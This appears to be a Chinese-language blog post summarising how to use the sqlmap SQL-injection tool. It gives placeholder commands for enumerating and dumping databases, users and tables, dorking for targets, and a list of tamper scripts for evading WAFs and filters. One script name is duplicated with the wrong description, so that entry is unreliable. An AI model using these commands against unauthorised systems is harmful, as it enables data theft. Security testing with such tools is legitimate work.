sqlmap的使用方法

发布于 2020-04-17  485 次阅读


0x01 简介

最简单的介绍,sqlmap就是一个开源的,自动化的SQL注入工具。

0x02 常用命令

sqlmap -u "url" --dbs                 #获取所有数据库
sqlmap -u "url" --users               #获取所有用户名称
sqlmap -u "url" --current-db          #获取当前数据库名称
sqlmap -u "url" --current-user        #获取当前用户名称
sqlmap -u "url" --is-dba              #查看当前用户是否是管理员
sqlmap -u "url" -D [数据库名] --tables                  #获取表名
sqlmap -u "url" -D [数据库名] -T [表名] --columns        #获取字段名
sqlmap -u "url" -D [数据库名] -T [表名] -C [字段,字段] --dump        #获取字段内容
sqlmap -u "url" --random-agent                #使用随机 agent
sqlmap -u "url" --identify-waf         #判断网站是否有waf
sqlmap -u "url" --tamper [脚本]        #使用脚本
sqlmap -u "xxx.php" --data"id=1"       #POST注入
sqlmap -g "inurl:\".php?id=1\"" --random-agent  #Google的搜索,只获取前100个结果,不翻墙用不了

0x03 --tamper脚本模块

apostrophemask.py        #作用:将引号替换为utf-8,用于过滤单引号

base64encode.py            #作用:替换为base64编码

multiplespaces.py        #作用:围绕sql关键字添加多个空格

space2plus.py            #作用:用加号替换空格

nonrecursivereplacement.py     #作用:作为双重查询语句,用双重语句替代预定义的sql关键字

space2randomblank.py        #作用:将空格替换为其他有效字符

unionalltounion.py        #作用:将union allselect 替换为unionselect

securesphere.py        #作用:追加特定的字符串

space2dash.py                #作用:将空格替换为--,并添加一个随机字符串和换行符

space2mssqlblank.py        #作用:将空格随机替换为其他空格符号
between.py                #作用:用NOT BETWEEN 0 AND #替换>

percentage.py            #作用:在每个字符前添加一个%

sp_password.py            #作用:从T-SQL日志的自动迷糊处理的有效载荷中追加sp_password

charencode.py            #作用:对给定的payload全部字符使用url编码(不处理已经编码的字符)

randomcase.py            #作用:随机大小写

charunicodeencode.py        #作用:适用字符串的unicode编码

space2comment.py            #作用:将空格替换为/**/

equaltolike.py            #作用:将=替换为LIKE

equaltolike.py            #作用:将>替换为GREATEST,绕过对>的过滤

ifnull2ifisnull.py        #作用:将类似于IFNULL(A, B)替换为IF(ISNULL(A), B, A),绕过对IFNULL的过滤

modsecurityversioned.py        #作用:过滤空格,使用mysql内联注释的方式进行注入

space2mysqlblank.py        #作用:将空格替换为其他空格符号('%09', '%0A', '%0C', '%0D', '%0B')

modsecurityzeroversioned.py        #作用:使用内联注释方式(/*!00000*/)进行注入

space2mysqldash.py        #作用:将空格替换为 -- ,并追随一个换行符

bluecoat.py            #作用:在sql语句之后用有效的随机空白字符替换空格符,随后用LIKE替换=

versionedkeywords.py            #作用:注释绕过

halfversionedmorekeywords.py        #作用:在每个关键字前添加mysql版本注释

space2morehash.py            #作用:将空格替换为#,并添加一个随机字符串和换行符

apostrophenullencode.py        #作用:用非法双字节Unicode字符替换单引号

appendnullbyte.py            #作用:在有效载荷的结束位置加载null字节字符编码

chardoubleencode.py        #作用:对给定的payload全部字符使用双重url编码(不处理已经编码的字符)

unmagicquotes.py            #作用:用一个多字节组合%bf%27和末尾通用注释一起替换空格

randomcomments.py            #作用:用注释符分割sql关键字

我不懂世界到底在热闹些什么